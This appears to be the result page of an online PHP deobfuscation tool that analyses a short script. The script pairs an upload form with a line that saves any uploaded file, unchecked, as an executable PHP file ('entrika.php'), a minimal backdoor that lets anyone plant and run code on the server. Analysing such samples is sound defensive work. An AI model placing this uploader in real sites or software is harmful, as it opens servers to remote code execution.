Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST"> <INPUT TYPE="hid..

Decoded Output download

<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST"> 
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000"> 
Send this file: <INPUT NAME="userfile" TYPE="file"> 
<INPUT TYPE="submit" VALUE="Send"> 
</FORM> 
<? 
move_uploaded_file($userfile, "entrika.php");  
?> 
 

Did this file decode correctly?

Original Code

<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
Send this file: <INPUT NAME="userfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<?
move_uploaded_file($userfile, "entrika.php"); 
?>

Function Calls

move_uploaded_file 1

Variables

None

Stats

MD5 b9a9aab319964351b46bd5fc9d6246a8
Eval Count 0
Decode Time 81 ms